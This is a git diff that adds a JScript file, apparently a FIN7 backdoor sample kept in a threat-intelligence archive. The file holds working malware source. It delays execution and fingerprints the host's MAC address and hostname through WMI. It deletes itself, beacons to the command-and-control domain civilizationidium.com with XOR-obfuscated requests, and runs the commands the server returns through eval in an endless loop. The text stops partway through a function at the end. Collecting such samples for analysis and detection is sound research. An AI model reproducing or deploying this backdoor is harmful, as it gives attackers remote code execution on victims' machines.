diff --git a/cybercriminal groups/FIN7/2021-08-24/code/layer3.js b/cybercriminal groups/FIN7/2021-08-24/code/layer3.js new file mode 100644 index 0000000..56f739d --- /dev/null +++ b/cybercriminal groups/FIN7/2021-08-24/code/layer3.js @@ -0,0 +1,137 @@ +function func_start_delay () { + var s_WScript = WScript; + s_WScript.Sleep(120000); +} +function func_crypt_controller (var_type, var_request) { + try{ + var encryption_key = ""; + if(var_type === "decrypt") { + var_request = unescape(var_request); + var request_split = var_request.split("&_&"); + var_request = request_split[0]; + if (request_split.length == 2) { + encryption_key = request_split[1].split(""); + }else{ + return var_request; + } + }else{ + encryption_key = (Math.floor(Math.random()*9000) + 1000).toString().split(""); + var_request=unescape(encodeURIComponent(var_request)); + } + var var_output = new Array(var_request.length); + for (var i_counter = 0; i_counter < var_request.length; i_counter++) { + var var_charCode = var_request.charCodeAt(i_counter) ^ encryption_key[i_counter % encryption_key.length].charCodeAt(0); + var_output[i_counter] = String.fromCharCode(var_charCode); + } + var result_string = var_output.join(""); + if(var_type === "encrypt") { + result_string = result_string + "&_&" + encryption_key.join(""); + result_string = escape(result_string); + } + return result_string; + }catch(e) { + return "no"; + } +} +function func_id () { + var mac_address = "#Error#"; + var dns_hostname = "#Error#"; + try{ + var lrequest = wmi.ExecQuery("select * from Win32_NetworkAdapterConfiguration where ipenabled = true"); + var lItems = new Enumerator(lrequest); + for (; !lItems.atEnd(); lItems.moveNext()) { + mac_address = lItems.item().macaddress; + dns_hostname = lItems.item().DNSHostName; + if(typeof mac_address === "string" && mac_address.length > 1) { + if(typeof dns_hostname !== "string" && dns_hostname.length < 1) { + dns_hostname = "Unknown"; + }else{ + for (var i_counter = 0; i_counter < dns_hostname.length; i_counter++) { + if (dns_hostname.charAt(i_counter) > "z") { + dns_hostname = dns_hostname.substr(0, i_counter) + "_" + dns_hostname.substr(i_counter + 1); + } + } + } + return mac_address + "_" + dns_hostname; + } + } + }catch(e) { + return mac_address + "_" + dns_hostname; + } +} +function func_main () { + var ncommand = ""; + var s_WScript = WScript; + ncommand = send_data("request", "page_id=new", true); + if(ncommand !== "no") { + try { + ncommand = func_crypt_controller("decrypt", ncommand); + if(ncommand !== "no") { + eval(func_crypt_controller("decrypt", ncommand)); + } + }catch(e) { + } + } + var random_knock = 120000 + (Math.floor(Math.random() * 16001) - 5000); + s_WScript.Sleep(random_knock); + func_main(); +} +function func_get_path () { + var var_pathes = ["images", "pictures", "img", "info", "new"]; + var var_files = ["sync", "show", "hide", "add", "new", "renew", "delete"]; + var var_path = var_pathes[Math.floor(Math.random() * var_pathes.length)] + "/" + var_files[Math.floor(Math.random() * var_files.length)]; + return "https://civilizationidium.com/" + var_path; +} +var wmi = GetObject("winmgmts:root/CIMV2"); +var shell = new ActiveXObject("WScript.Shell"); +var fso = new ActiveXObject("Scripting.FileSystemObject"); +var app_path = shell.expandEnvironmentStrings("%APPDATA%"); +var uniq_id = new Date().getUTCMilliseconds(); +if(fso.GetAbsolutePathName(fso.GetParentFolderName(app_path)).indexOf("AppData") > 5) { + if(WScript.ScriptFullName.indexOf("Microsoft"+String.fromCharCode(0x5C)+"Windows")<0){ + try{ + fso.deleteFile(WScript.ScriptFullName); + }catch(e) {} + } + try{ + func_start_delay (); + func_main(); + }catch(e) { + func_main(); + } +} +function send_data (var_type, var_data, var_crypt) { + try { + var http_object = new ActiveXObject("MSXML2.ServerXMLHTTP"); + if(var_type === "request") { + http_object.open("POST", func_get_path () + "?type=name", false); + var_data = "zawgkveuwynyjvizs=" + func_crypt_controller("encrypt", "group=sp&rt=0&secret=HiyFIYF973IYFCviyv&time=120000&uid=" + uniq_id + "&id=" + func_id() + "&" + var_data); + }else{ + http_object.open("POST", func_get_path () + "?type=content&id=" + uniq_id, false); + if(var_crypt) { + var_data = func_crypt_controller("encrypt", var_data); + } + } + http_object.setRequestHeader("User-Agent", "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:69.0) Gecko/20100101 Firefox/50.0"); + http_object.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); + http_object.setOption(2, 13056); + http_object.send(var_data); + return http_object.responseText; + }catch(e) { + return "no"; + } +} +function func_decrypt(strInpit) { + strPass = {redacted} + var strRet=new String(""); + var arrtext = strInpit.split(","); + var i_counter=0;var j_counter=0; + for(i_counter=0;i_counter